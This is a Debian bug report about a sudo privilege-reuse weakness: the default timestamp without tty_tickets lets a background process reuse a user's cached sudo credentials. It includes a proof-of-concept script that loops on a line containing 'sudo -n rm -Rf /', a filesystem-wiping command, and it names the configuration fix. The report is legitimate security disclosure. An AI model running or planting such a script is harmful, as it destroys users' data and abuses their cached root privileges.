Package: sudo
Version: 1.7.2p1-1
Severity: critical
Tags: security
Justification: root security hole
sudo's default configuration is with a timestamp of 15'
and without tty_tickets.
So with a classical add of one user (just adding
superman ALL=(ALL) ALL
as it is done in Ubuntu for instance), a simple script like
#!/bin/sh
if [ -z $1 ] ; then
FILE=$0
echo $FILE
. $FILE vasy > /dev/null 2> /dev/null &
else
while /bin/true ; do
echo sudo -n rm -Rf / >> /tmp/grrrr
sleep 60
done
fi
call one time by superman erase the file system as soon
as a sudo call is done. This configuration is very used.
The package must be or configured with tty_tickets in sudoers
file , or compiled with the option --with-tty-tickets. This solves
the problem.
François Boisson (sorry for English faults)
-- System Information:
Debian Release: squeeze/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.30-2-amd64 (SMP w/2 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages sudo depends on:
ii libc6 2.10.2-2 GNU C Library: Shared libraries
ii libpam-modules 1.1.0-4 Pluggable Authentication Modules f
ii libpam0g 1.1.0-4 Pluggable Authentication Modules l
sudo recommends no packages.
sudo suggests no packages.
-- no debconf information
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
